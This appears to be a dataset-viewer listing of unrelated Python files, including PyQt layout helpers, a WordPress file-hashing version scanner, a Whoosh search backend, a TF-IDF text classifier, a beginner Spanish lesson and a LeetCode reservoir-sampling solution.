# noinspection PyPep8Naming
def addWidget(self, widget, alignment: Optional[Union[Qt.Alignment, Qt.AlignmentFlag]] = None) -> None:
"""
Adds widget.
@param widget: QWidget
@param alignment: Alignment
"""
if alignment:
self._layout.addWidget(widget)
else:
self._layout.addWidget(widget)
# noinspection PyPep8Naming
def addLayout(self, layout: QLayout) -> None:
"""
Adds layout.
@param layout: QLayout
"""
self._layout.addLayout(layout)
# noinspection PyPep8Naming
def addSpacing(self, spacing: int) -> None:
"""
Adds spacing.
@param spacing: Spacing value
"""
self._layout.addSpacing(spacing)
# noinspection PyPep8Naming
def addButtons(self, data: Dict[str, Tuple[str, Callable]]) -> Dict[int, QPushButton]:
"""
Adds buttons.
@param data: Dictionary {text: (icon, callback), …}
@return: Dictionary {index: QPushButton, …}
"""
buttons = QButtons(data)
self.addLayout(buttons)
return buttons.dictionary
|
python
|
#import json
def parse(command):
#split = json.loads(command)
#parsedCommand = split
return command
def main():
pass
if __name__ == "__main__":
main()
|
python
|
from happy_bittorrent.algorithms.torrent_manager import *
|
python
|
import pytest
import shutil
import zipfile
from pathlib import Path
from squirrel.settings import AddonInstallerSettings
from squirrel.addons import ZipAddon
from test_addon_install import test_addon_install_path
from test_addon_install import test_addon_backup_path
from test_addon_install import settings
from fixtures import zip_files
from fixtures import valid_addons
from fixtures import invalid_addons
# Gather valid addons
# Install them
# @pytest.mark.parametrize('file_or_folder', valid_addons)
@pytest.mark.parametrize('targets', [valid_addons, ])
def test_install_valid_addons_and_index(
settings,
zip_files,
test_addon_install_path,
test_addon_backup_path,
):
settings.addon_path = test_addon_install_path
settings.backup_path = test_addon_backup_path
addons = [ZipAddon(zip_file, settings=settings) for zip_file in zip_files]
for addon in addons:
addon.install()
# addon = ZipAddon(addon_filename=zip_file, settings=settings)
# addon.install()
# Run the indexing
# Check the index content
|
python
|
#!/usr/bin/python
import csv
import hashlib
import os
import sys
idx = 1
IGNORED_DIRECTORIES = {'.git', '.svn'}
def walk(version_root, app, version):
if type(version) == type(bytes):
version = version.decode("utf8")
if version in IGNORED_DIRECTORIES:
return
global idx
print('av %d %s' % (idx, version_root), file=sys.stderr)
idx += 1
for root, d_names, f_names in os.walk(version_root):
for ignored_directory in IGNORED_DIRECTORIES:
if ignored_directory in d_names:
d_names.remove(ignored_directory)
for f in f_names:
try:
file_path = os.path.join(root, f)
hsh = sha256_f(file_path)
# print('%s\t%s\t%s\t%s\t%s' % (
# app, version, hsh, remove_prefix(file_path, version_root).count('/'), file_path))
print('%s\t%s\t%s\t%s' % (app, version, hsh, remove_prefix(file_path, version_root).count('/')))
except:
print('err: %s' % str(sys.exc_info()), file=sys.stderr)
BLOCK_SIZE = 16 * (2 ** 10)
def sha256_f(path):
sha256_hash = hashlib.sha256()
with open(path, 'rb') as f:
for byte_block in iter(lambda: f.read(BLOCK_SIZE), b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def remove_prefix(string, prefix):
return string[len(prefix):] if string.startswith(prefix) else string
def subdirectories(path):
return [(x, os.path.join(path, x)) for x in os.listdir(path) if os.path.isdir(os.path.join(path, x))]
def main(root, db):
already_parsed_avs = set()
if db is not None:
with open(db, 'r') as db_file:
for row in csv.reader(db_file, delimiter='\t'):
already_parsed_avs.add((row[0], row[1]))
def filtered_walk(vp, a, v):
if not ((a, v) in already_parsed_avs):
walk(vp, a, v)
for (directory, path) in subdirectories(root):
app = directory
if app.endswith('-cores'):
for (version, version_path) in subdirectories(path):
filtered_walk(version_path, app, version)
elif app.endswith('-themes'):
for (app, app_path) in subdirectories(path):
app = 'wp.t' + app
for (version, version_path) in subdirectories(app_path):
filtered_walk(version_path, app, version)
elif app.endswith('-plugins'):
for (app, app_path) in subdirectories(path):
app = 'wp.p' + app
trunk_path = os.path.join(app_path, 'trunk')
tags_path = os.path.join(app_path, 'tags')
if os.path.isdir(trunk_path):
filtered_walk(trunk_path, app, 'trunk')
if os.path.isdir(tags_path):
for (version, version_path) in subdirectories(tags_path):
filtered_walk(version_path, app, version)
# local testing only branch!
# else:
# for (version, version_path) in subdirectories(path):
# filtered_walk(version_path, app, version)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('scanner.py path_to_scan [already_scanned_av_csv]', file=sys.stderr)
elif len(sys.argv) == 2:
main(sys.argv[1], None)
elif len(sys.argv) > 2:
main(sys.argv[1], sys.argv[2])
|
python
|
import logging
from pathlib import Path
import whoosh
from whoosh import qparser
from whoosh.filedb.filestore import FileStorage
from whoosh.index import EmptyIndexError
from whoosh.query import Every
from django.conf import settings
from mayan.apps.common.utils import any_to_bool, parse_range
from mayan.apps.lock_manager.backends.base import LockingBackend
from mayan.apps.lock_manager.exceptions import LockError
from ..classes import SearchBackend, SearchModel
from ..exceptions import DynamicSearchRetry
from ..settings import setting_results_limit
from .literals import (
DJANGO_TO_WHOOSH_FIELD_MAP, TEXT_LOCK_INSTANCE_DEINDEX,
TEXT_LOCK_INSTANCE_INDEX, WHOOSH_INDEX_DIRECTORY_NAME,
)
logger = logging.getLogger(name=__name__)
class WhooshSearchBackend(SearchBackend):
field_map = DJANGO_TO_WHOOSH_FIELD_MAP
def __init__(self, **kwargs):
index_path = kwargs.pop('index_path', None)
writer_limitmb = kwargs.pop('writer_limitmb', 128)
writer_multisegment = kwargs.pop('writer_multisegment', False)
writer_procs = kwargs.pop('writer_procs', 1)
super().__init__(**kwargs)
self.index_path = Path(
index_path or Path(settings.MEDIA_ROOT, WHOOSH_INDEX_DIRECTORY_NAME)
)
if writer_limitmb:
writer_limitmb = int(writer_limitmb)
if writer_multisegment:
writer_multisegment = any_to_bool(value=writer_multisegment)
if writer_procs:
writer_procs = int(writer_procs)
self.writer_kwargs = {
'limitmb': writer_limitmb, 'multisegment': writer_multisegment,
'procs': writer_procs
}
def _get_status(self):
result = []
title = 'Whoosh search model indexing status'
result.append(title)
result.append(len(title) * '=')
for search_model in SearchModel.all():
index = self.get_or_create_index(search_model=search_model)
search_results = index.searcher().search(Every('id'))
result.append(
'{}: {}'.format(
search_model.label, search_results.estimated_length()
)
)
return '\n'.join(result)
def _initialize(self):
self.index_path.mkdir(exist_ok=True)
def _search(
self, query, search_model, user, global_and_search=False,
ignore_limit=False
):
index = self.get_or_create_index(search_model=search_model)
id_list = []
with index.searcher() as searcher:
search_string = []
for key, value in query.items():
search_string.append(
'{}:({})'.format(key, value)
)
global_logic_string = ' AND ' if global_and_search else ' OR '
search_string = global_logic_string.join(search_string)
logger.debug('search_string: %s', search_string)
parser = qparser.QueryParser(
fieldname='_', schema=index.schema
)
parser.remove_plugin_class(cls=qparser.WildcardPlugin)
parser.add_plugin(pin=qparser.PrefixPlugin())
whoosh_query = parser.parse(text=search_string)
if ignore_limit:
limit = None
else:
limit = setting_results_limit.value
results = searcher.search(q=whoosh_query, limit=limit)
logger.debug('results: %s', results)
for result in results:
id_list.append(result['id'])
return search_model.get_queryset().filter(
id__in=id_list
).distinct()
def clear_search_model_index(self, search_model):
schema = self.get_search_model_schema(search_model=search_model)
# Clear the model index.
self.get_storage().create_index(
indexname=search_model.get_full_name(), schema=schema
)
def deindex_instance(self, instance):
try:
lock = LockingBackend.get_backend().acquire_lock(
name=TEXT_LOCK_INSTANCE_DEINDEX
)
except LockError:
raise
else:
try:
search_model = SearchModel.get_for_model(instance=instance)
index = self.get_or_create_index(search_model=search_model)
with index.writer(**self.writer_kwargs) as writer:
writer.delete_by_term('id', str(instance.pk))
finally:
lock.release()
def get_or_create_index(self, search_model):
storage = self.get_storage()
schema = self.get_search_model_schema(search_model=search_model)
try:
# Explicitly specify the schema. Allows using existing index
# when the schema changes.
index = storage.open_index(
indexname=search_model.get_full_name(), schema=schema
)
except EmptyIndexError:
index = storage.create_index(
indexname=search_model.get_full_name(), schema=schema
)
return index
def get_search_model_schema(self, search_model):
field_map = self.get_resolved_field_map(search_model=search_model)
schema_kwargs = {key: value['field'] for key, value in field_map.items()}
return whoosh.fields.Schema(**schema_kwargs)
def get_storage(self):
return FileStorage(path=self.index_path)
def index_instance(self, instance, exclude_model=None, exclude_kwargs=None):
try:
lock = LockingBackend.get_backend().acquire_lock(
name=TEXT_LOCK_INSTANCE_INDEX
)
except LockError:
raise
else:
try:
search_model = SearchModel.get_for_model(instance=instance)
index = self.get_or_create_index(search_model=search_model)
with index.writer(**self.writer_kwargs) as writer:
kwargs = search_model.populate(
backend=self, instance=instance,
exclude_model=exclude_model,
exclude_kwargs=exclude_kwargs
)
try:
writer.delete_by_term('id', str(instance.pk))
writer.add_document(**kwargs)
except Exception as exception:
logger.error(
'Unexpected exception while indexing object '
'id: %(id)s, search model: %(search_model)s, '
'index data: %(index_data)s, raw data: '
'%(raw_data)s, field map: %(field_map)s; '
'%(exception)s' % {
'exception': exception,
'field_map': self.get_resolved_field_map(
search_model=search_model
),
'id': instance.pk,
'index_data': kwargs,
'raw_data': instance.__dict__,
'search_model': search_model.get_full_name()
}, exc_info=True
)
raise
except whoosh.index.LockError:
raise DynamicSearchRetry
finally:
lock.release()
def index_search_model(self, search_model, range_string=None):
queryset = search_model.get_queryset()
queryset = search_model.get_queryset()
if range_string:
queryset = queryset.filter(
pk__in=list(parse_range(range_string=range_string))
)
for instance in queryset:
self.index_instance(instance=instance)
def reset(self, search_model=None):
self.tear_down(search_model=search_model)
self.update_mappings(search_model=search_model)
def tear_down(self, search_model=None):
if search_model:
search_models = (search_model,)
else:
search_models = SearchModel.all()
for search_model in search_models:
self.clear_search_model_index(search_model=search_model)
def update_mappings(self, search_model=None):
if search_model:
search_models = (search_model,)
else:
search_models = SearchModel.all()
for search_model in search_models:
self.get_or_create_index(search_model=search_model)
|
python
|
from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
from collections import defaultdict
class BoundDictionary(defaultdict):
"""
A default dictionary where elements are tightly coupled.
The factory method is responsible for binding the parent object to the child.
If a reference attribute is assigned then child objects will have the key assigned to this.
Otherwise it's just a defaultdict.
"""
def __init__(self, reference=None, *args, **kw):
self.reference = reference
super(BoundDictionary, self).__init__(*args, **kw)
def __getitem__(self, key):
value = super(BoundDictionary, self).__getitem__(key)
if self.reference is not None:
setattr(value, self.reference, key)
return value
|
python
|
import os
import random
import numpy as np
import pickle as pkl
import networkx as nx
import scipy.sparse as sp
from utils import loadWord2Vec
from math import log
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn.svm import LinearSVC
# build corpus
dataset = '20ng'
# shulffing
doc_name_list = []
doc_train_list = []
doc_test_list = []
f = open('data/' + dataset + '.txt', 'r')
for line in f.readlines():
doc_name_list.append(line.strip())
temp = line.split("\t")
if temp[1].find('test') != -1:
doc_test_list.append(line.strip())
elif temp[1].find('train') != -1:
doc_train_list.append(line.strip())
f.close()
doc_content_list = []
f = open('data/corpus/' + dataset + '.clean.txt', 'r')
for line in f.readlines():
doc_content_list.append(line.strip())
f.close()
train_ids = []
for train_name in doc_train_list:
train_id = doc_name_list.index(train_name)
train_ids.append(train_id)
print(train_ids)
random.shuffle(train_ids)
# partial labeled data
f = open('data/' + dataset + '.train.index', 'r')
lines = f.readlines()
f.close()
train_ids = [int(x.strip()) for x in lines]
#train_ids = train_ids[:int(0.2 * len(train_ids))]
test_ids = []
for test_name in doc_test_list:
test_id = doc_name_list.index(test_name)
test_ids.append(test_id)
print(test_ids)
random.shuffle(test_ids)
ids = train_ids + test_ids
print(ids)
print(len(ids))
train_size = len(train_ids)
val_size = int(0.1 * train_size)
real_train_size = train_size - val_size
shuffle_doc_name_list = []
shuffle_doc_words_list = []
for id in ids:
shuffle_doc_name_list.append(doc_name_list[int(id)])
shuffle_doc_words_list.append(doc_content_list[int(id)])
tfidf_vec = TfidfVectorizer() #max_features=50000
tfidf_matrix = tfidf_vec.fit_transform(shuffle_doc_words_list)
print(tfidf_matrix)
#tfidf_matrix_array = tfidf_matrix.toarray()
# BOW TFIDF + LR
#train_x = []
train_y = []
#test_x = []
test_y = []
for i in range(len(shuffle_doc_words_list)):
doc_words = shuffle_doc_words_list[i]
words = doc_words.split(' ')
doc_meta = shuffle_doc_name_list[i]
temp = doc_meta.split('\t')
label = temp[2]
if i < train_size:
#train_x.append(tfidf_matrix_array[i])
train_y.append(label)
else:
#test_x.append(tfidf_matrix_array[i])
test_y.append(label)
#clf = svm.SVC(decision_function_shape='ovr', class_weight="balanced",kernel='linear')
#clf = LinearSVC(random_state=0)
clf = LogisticRegression(random_state=1)
clf.fit(tfidf_matrix[:train_size], train_y)
predict_y = clf.predict(tfidf_matrix[train_size:])
correct_count = 0
for i in range(len(test_y)):
if predict_y[i] == test_y[i]:
correct_count += 1
accuracy = correct_count * 1.0 / len(test_y)
print(dataset, accuracy)
print("Precision, Recall and F1-Score...")
print(metrics.classification_report(test_y, predict_y, digits=4))
|
python
|
# Clase 4. Curso Píldoras Informáticas.
print(5 + 6)
print(10 % 3)
print(5 ** 3)
print(9 / 2)
print(9 // 2)
Nombre = 5
print(type(Nombre))
Nombre = 5.4
print(type(Nombre))
Nombre = "John"
print(type(Nombre))
Mensaje = """ Esto es un
mensaje utilizando comilla
triple. Sirve para dar todos
los saltos de líneas que te vengan
en gana."""
print(Mensaje)
Number1 = 4
Number2 = 6
if Number2>Number1:
print(Number2, "es mayor que", Number1)
else:
print(Number2, "es menor o igual que", Number1)
|
python
|
#
# @lc app=leetcode.cn id=382 lang=python3
#
# [382] 链表随机节点
#
# https://leetcode-cn.com/problems/linked-list-random-node/description/
#
# algorithms
# Medium (57.03%)
# Likes: 66
# Dislikes: 0
# Total Accepted: 6K
# Total Submissions: 10.6K
# Testcase Example: '["Solution","getRandom"]\n[[[1,2,3]],[]]'
#
# 给定一个单链表,随机选择链表的一个节点,并返回相应的节点值。保证每个节点被选的概率一样。
#
# 进阶:
# 如果链表十分大且长度未知,如何解决这个问题?你能否使用常数级空间复杂度实现?
#
# 示例:
#
#
# // 初始化一个单链表 [1,2,3].
# ListNode head = new ListNode(1);
# head.next = new ListNode(2);
# head.next.next = new ListNode(3);
# Solution solution = new Solution(head);
#
# // getRandom()方法应随机返回1,2,3中的一个,保证每个元素被返回的概率相等。
# solution.getRandom();
#
#
#
# @lc code=start
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def __init__(self, head: ListNode):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
"""
self.head = head
def getRandom(self) -> int:
"""
Returns a random node's value.
"""
import random
i = 0
res = 0
p = self.head
while p:
r = random.randint(0,i)
if r == 0:
res = p.val
i = i + 1
p = p.next
return res
# Your Solution object will be instantiated and called as such:
# obj = Solution(head)
# param_1 = obj.getRandom()
# @lc code=end
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.